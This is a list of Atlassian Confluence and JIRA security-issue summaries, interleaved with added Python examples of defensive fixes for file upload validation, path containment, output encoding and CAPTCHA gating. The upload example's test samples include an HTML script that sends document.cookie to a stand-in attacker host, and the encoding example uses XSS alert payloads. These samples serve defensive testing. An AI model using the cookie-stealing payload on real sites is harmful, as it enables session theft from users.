sudo is decorated with global decorator
The reasoning behind preventing theme developers from theming the admin areas was that if you don't know what you are doing, you can mess things up to such an extent that you are unable to use Confluence. By decorating the sudo login pages using the global decorator, it exposes the user to...
Logout Button / Option Missing for some LDAP user accounts
Instance Details / Description: The logout option to kill sessions is not present for some user accounts, i.e. the zzsvat01-05 test accounts. It is believed that this is caused by LDAP user accounts that don't have a first and / or last name present. For these specific rare instances i.e. probably...
Malicious File Upload
The application server accepted a vbscript file, an HTML file containing JavaScript, and the EICAR test virus as allowed attachments. This means that an attacker could submit a malicious file to the backend, where the file might be launched by another internal RIM employee if they click and open...
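The entry above says the server accepted a VBScript file, an HTML file carrying JavaScript, and the EICAR test file as attachments. The following is an added example, not code from Confluence or JIRA, of the deny-by-default attachment check that would have rejected all three, plus the response headers that stop a browser from rendering a stored attachment inline. The extension allow-list, the magic-number table, the sample files and the EICAR check are all constructed for the demo; in production the bytes would be handed to a real scanner rather than matched against the EICAR marker.

```python
"""Attachment validation for a file-upload endpoint (added example, not Atlassian code)."""
import re
from dataclasses import dataclass

# Deny by default: only these extensions are ever stored. (Assumed policy.)
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "gif", "txt", "csv", "docx", "xlsx", "zip"}

# Leading bytes ("magic numbers") for the binary formats we accept.
MAGIC = {
    "pdf": [b"%PDF-"],
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
    "docx": [b"PK\x03\x04"],
    "xlsx": [b"PK\x03\x04"],
    "zip": [b"PK\x03\x04"],
}

# Markup a browser would execute if it sniffed a "text" attachment as HTML.
ACTIVE_CONTENT = re.compile(
    rb"<\s*(script|html|body|iframe|svg|object|embed)\b|javascript:", re.IGNORECASE
)

# Stand-in for an AV scanner: the EICAR file's identifying substring.
EICAR_MARKER = b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE"


@dataclass(frozen=True)
class Verdict:
    accepted: bool
    reason: str


def _extension(filename: str) -> str:
    # Only the last suffix counts: "report.pdf.vbs" is a .vbs file.
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def check_attachment(filename: str, data: bytes) -> Verdict:
    ext = _extension(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return Verdict(False, f"extension .{ext or '(none)'} not in allow-list")
    head = data[:4096]
    if EICAR_MARKER in head:
        return Verdict(False, "matches EICAR test signature")
    if ext in MAGIC and not any(head.startswith(m) for m in MAGIC[ext]):
        return Verdict(False, f"content does not look like .{ext}")
    # Text types: refuse anything a browser could treat as markup or script.
    if ext in {"txt", "csv"} and ACTIVE_CONTENT.search(head):
        return Verdict(False, "text attachment contains active HTML/JavaScript content")
    return Verdict(True, "ok")


def download_headers(filename: str) -> dict:
    """Headers for serving a stored attachment so it is downloaded, never rendered."""
    safe_name = re.sub(r"[^\w.\- ]", "_", filename)
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }


# Constructed samples mirroring the three files in the report, plus two PDFs.
SAMPLES = {
    "notes.vbs": b'MsgBox "hi"\r\n',
    "page.html": b"<html><script>document.location='http://attacker.example/?c='+document.cookie</script></html>",
    "readme.txt": b"<script>alert(1)</script>",  # HTML disguised as text
    "eicar.txt": b"(constructed stand-in) $" + EICAR_MARKER + b"!$H+H*",
    "report.pdf": b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n1 0 obj\n",
    "fake.pdf": b"<html>not a pdf</html>",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        v = check_attachment(name, blob)
        print(f"{name:12} accepted={str(v.accepted):5} {v.reason}")
```

The magic-number and active-content checks only inspect the first 4 KiB, which is enough to catch the mismatches in the report but not a polyglot that carries HTML deep inside an otherwise valid ZIP; the `nosniff` and `attachment` headers are what protect the second reader regardless of what was stored.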
XSS vulnerability in Clickr theme
We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence Clickr theme. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's own web server. An attacker...
XSS vulnerability in Contributors macro
We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence contributors macro. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's own web server. An...
XSS vulnerability in PDF export
We have identified and fixed a cross-site scripting XSS vulnerability in the Confluence action that performs the export to PDF. An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to such an attacker's o...
Can not UPDATE the "Viewable By" field of an issue
After the creation of an issue it is by default viewable by "All Users". It is not possible to change the value after re-editing that issue. After changing it and clicking the "Update" button, the viewable by entry stays "All Users"...
WebSudo should be disabled in devmode
When Confluence is started in dev mode, WebSudo should be disabled...
XSS in mailpage plugin
An XSS vulnerability has been reported against the mailpage plugin. It allows an attacker to execute arbitrary JavaScript. A new version of the issue has been released that fixes this problem...
Pluggable CAPTCHA
(Filed as a suggestion for both JIRA Cloud and JIRA Server: http://jira.atlassian.com/browse/JRACLOUD-21359 and http://jira.atlassian.com/browse/JRASERVER-21359.) CAPTCHA should be pluggable in JIRA. CAPTCHA (http://en.wikipedia.org/wiki/CAPTCHA) is supposed to stop spam and other automated nefarious usage of systems. But there is an arms race of CAPTCHA breaking (http://www.slightlyshadyseo.com/index.php/xmcps-how-tobasic-captcha-cracking-techniques-part-1/) a...
Password strength measurement and restriction
(Filed as a suggestion for both JIRA Cloud and JIRA Server: http://jira.atlassian.com/browse/JRACLOUD-21358 and http://jira.atlassian.com/browse/JRASERVER-21358.) Enable password strength rules to: tell the user the effective strength of the password they choose; optionally allow administrators to restrict the minimum strength of passwords chosen by users; be pluggable. Currently you can enforce password strength by using JIRA with Crowd...
500page.jsp Improvements
(Filed as a suggestion for both Confluence Cloud and Confluence Server: http://jira.atlassian.com/browse/CONFCLOUD-19601 and http://jira.atlassian.com/browse/CONFSERVER-19601.) Some further improvements to the 500page.jsp: The "Cause" and "Stack Trace: hide" elements should not appear if there is no stack trace. The stack trace should not appear if the user triggering the page is an anonymous user. Changes to this sentence below: "Your Confluence administrator can...
The system paths are to be locked down to the JIRA Home directory
Currently JIRA allows you to change system file paths at runtime. While convenient, this allowed an attacker to elevate his/her stolen system admin access into a situation where he/she can execute arbitrary code. A decision has been made to remove the ability to set the paths at run time. For new...
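The fix above removes the runtime setting altogether. Where a path must stay configurable (an attachment or index directory, say), the check that keeps it inside the home directory is the one below. This is an added example and not JIRA's code: it canonicalises both sides before comparing, so `..` segments, absolute paths, symlinks planted inside the home that point elsewhere, and a sibling directory whose name merely starts with the home's name are all rejected. The directory layout is constructed in a temporary directory; the names are assumptions.

```python
"""Keep a configurable path inside the application home (added example, not Atlassian code)."""
import tempfile
from pathlib import Path


class PathOutsideHome(ValueError):
    pass


def resolve_under_home(home: Path, requested: str) -> Path:
    """Return the canonical path for `requested`, or raise if it escapes `home`.

    Both sides are resolved (symlinks followed, '..' collapsed) before the
    containment test, and the test is done on path components rather than
    string prefixes, so "/srv/jira-home2" is not mistaken for "/srv/jira-home/...".
    """
    home_real = home.resolve(strict=True)
    # If `requested` is absolute, pathlib's "/" discards `home_real`; the
    # containment check below still catches that case.
    candidate = (home_real / requested).resolve(strict=False)
    try:
        candidate.relative_to(home_real)
    except ValueError:
        raise PathOutsideHome(f"{requested!r} resolves to {candidate}, outside {home_real}") from None
    return candidate


def _classify(home: Path, requested: str) -> str:
    try:
        resolve_under_home(home, requested)
        return "allowed"
    except PathOutsideHome:
        return "rejected"


def demo() -> dict:
    """Build a constructed layout and classify several candidate settings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp).resolve()
        home = root / "jira-home"
        (home / "data" / "attachments").mkdir(parents=True)
        (root / "secrets").mkdir()
        (root / "jira-home2").mkdir()  # sibling sharing the home's name as a prefix
        (home / "data" / "escape").symlink_to(root / "secrets")  # symlink leading out of home
        cases = {
            "plain subdir": "data/attachments",
            "dot-dot that stays inside": "data/../data/attachments",
            "dot-dot traversal": "../secrets",
            "absolute path outside": str(root / "secrets"),
            "symlink out of home": "data/escape",
            "sibling with same prefix": "../jira-home2",
        }
        return {label: _classify(home, req) for label, req in cases.items()}


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{verdict:8} {label}")
```

Resolving at validation time is not the whole story: a symlink can be planted after the setting is saved, so a service that writes to such a directory should also open files with `O_NOFOLLOW` or re-check at use time.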
XSS in page renderer
An XSS vulnerability has been identified in the page renderer. This issue provides a fix for this problem. The severity of this issue is rated HIGH. Please see http://confluence.atlassian.com/x/ZILmD for other security related issues as well as more information on how we rate issues...
Put a new security log into JIRA so that important events can be specifically logged
The idea is to have a specific atlassian-jira-security.log that contains important events such as user logged in, logged out, session created and so on. This would allow for more specific information about who is logged into JIRA and when. This has been mooted for a while and is now being done in...
XSS vulnerability in some JSPs under admin section
Several JSPs found under the admin section of Confluence have been found to be vulnerable to XSS attacks. This issue corrects those problems. This issue is rated HIGH. Please refer to http://confluence.atlassian.com/x/ZILmD for information on other security related issues and more information on...
Only strings are encoded
The XML encoder only encodes strings. This could make Confluence return non-encoded content. This issue is rated HIGH. Please see http://confluence.atlassian.com/x/ZILmD for more security related issues and more information on how we rate issues...
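The entry above names the bug class without showing it. The following added example (not Confluence's encoder) reproduces it with a toy template: an encoder that escapes only `str` values passes a list or a domain object straight through, and the template then stringifies it unescaped. The fix is to stringify first and escape the result, so the value's type no longer matters. The payload, the `DisplayName` class and the template are constructed for the demo.

```python
"""An encoder that escapes only strings, beside the fixed one (added example, not Atlassian code)."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

_EXTRA = {'"': "&quot;", "'": "&apos;"}
PAYLOAD = "<script>alert(document.cookie)</script>"


def encode_strings_only(value):
    """Vulnerable: a non-str value is returned untouched and stringified later by the template."""
    return escape(value, _EXTRA) if isinstance(value, str) else value


def encode_any(value):
    """Fixed: convert to text first, then escape, so nothing reaches the output unencoded."""
    return escape(str(value), _EXTRA)


class DisplayName:
    """Stand-in for a domain object (e.g. a user's name) whose __str__ carries raw input."""

    def __init__(self, raw: str):
        self.raw = raw

    def __str__(self) -> str:
        return self.raw


def render_property(encoder, label, value) -> str:
    # A template that trusts its encoder; the f-string calls str() on whatever it is handed.
    return f"<property><label>{encoder(label)}</label><value>{encoder(value)}</value></property>"


def injected_markup(xml_text: str) -> bool:
    """True if <value> ended up containing child elements (or unparseable markup) instead of text."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return True
    return len(root.find("value")) > 0


def demo() -> dict:
    cases = {
        "str payload": PAYLOAD,
        "list containing payload": [PAYLOAD],
        "object whose __str__ is the payload": DisplayName(PAYLOAD),
    }
    return {
        name: {
            "strings_only": injected_markup(render_property(encode_strings_only, "name", v)),
            "encode_any": injected_markup(render_property(encode_any, "name", v)),
        }
        for name, v in cases.items()
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:38} strings_only injected={result['strings_only']}  encode_any injected={result['encode_any']}")
    print(render_property(encode_strings_only, "name", [PAYLOAD]))
```

The general lesson is that output encoding belongs at the sink, after every conversion to text has happened; an encoder that branches on the input type leaves a gap for every type it did not anticipate.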
SOAP and XML-RPC APIs return too much information
The SOAP and XML-RPC APIs return more information than is needed. This issue corrects that problem. This issue is rated HIGH. Please see http://confluence.atlassian.com/x/ZILmD for more security related issues and information on how we rate our issues...
Path for daily backup is configurable through WEB UI
It is possible to set the daily backup path and partial name through the web UI. This could mean that information can be obtained by a rogue admin. This issue addresses that by introducing a flag so concerned administrators can remove this feature. This flag is set to false by default meaning it ...
Require user to answer CAPTCHA after three failed attempts
Require user to answer CAPTCHA after three failed attempts. For SOAP and XMLRPC this means that the user will have to open a browser to answer the CAPTCHA, similar to how Google does it. This issue has been rated MODERATE. Please refer to http://confluence.atlassian.com/x/ZILmD for details on oth...
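The control described above, as an added example that is not Confluence's code: a login guard that counts failures per username, demands a CAPTCHA once the count reaches three, and answers non-interactive (SOAP / XML-RPC) callers with an instruction to log in through a browser. The CAPTCHA is modelled as a "solved" flag because generating one is out of scope; the users, passwords and status strings are constructed for the demo.

```python
"""CAPTCHA gate after repeated login failures (added example, not Atlassian code)."""
import hashlib
import hmac
import os

CAPTCHA_THRESHOLD = 3  # failed attempts before a CAPTCHA is demanded (from the issue)
_PBKDF2_ROUNDS = 100_000


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _PBKDF2_ROUNDS)


class LoginGuard:
    def __init__(self, threshold: int = CAPTCHA_THRESHOLD):
        self.threshold = threshold
        self._users: dict[str, tuple[bytes, bytes]] = {}  # username -> (salt, hash)
        self._failures: dict[str, int] = {}
        # Dummy credential for unknown usernames, so they cost the same work and
        # are counted the same way as real ones (no user enumeration via behaviour).
        dummy_salt = os.urandom(16)
        self._dummy = (dummy_salt, _hash_password(os.urandom(8).hex(), dummy_salt))

    def add_user(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self._users[username] = (salt, _hash_password(password, salt))

    def requires_captcha(self, username: str) -> bool:
        return self._failures.get(username, 0) >= self.threshold

    def _password_ok(self, username: str, password: str) -> bool:
        salt, stored = self._users.get(username, self._dummy)
        ok = hmac.compare_digest(_hash_password(password, salt), stored)
        return ok and username in self._users

    def login(self, username: str, password: str, *, captcha_solved: bool = False,
              interactive: bool = True) -> str:
        # The CAPTCHA gate comes first: past the threshold the password is not
        # even checked, so a bot gains nothing by ignoring the CAPTCHA.
        if self.requires_captcha(username):
            if not interactive:
                # SOAP / XML-RPC callers cannot render a CAPTCHA; send them to the web UI.
                return "captcha-required-use-browser"
            if not captcha_solved:
                return "captcha-required"
        if self._password_ok(username, password):
            self._failures.pop(username, None)  # only a real login clears the counter
            return "ok"
        self._failures[username] = self._failures.get(username, 0) + 1
        return "bad-credentials"


if __name__ == "__main__":
    guard = LoginGuard()
    guard.add_user("alice", "correct horse battery staple")
    for attempt in ["wrong1", "wrong2", "wrong3", "correct horse battery staple"]:
        print(attempt, "->", guard.login("alice", attempt))
    print("via SOAP ->", guard.login("alice", "correct horse battery staple", interactive=False))
    print("with CAPTCHA ->", guard.login("alice", "correct horse battery staple", captcha_solved=True))
```

Two caveats a deployment needs: the counter here lives in one process, so a cluster needs it in a shared store; and because it is keyed by username alone, anyone who knows a username can force its owner through a CAPTCHA, which is why this is a CAPTCHA rather than a lockout.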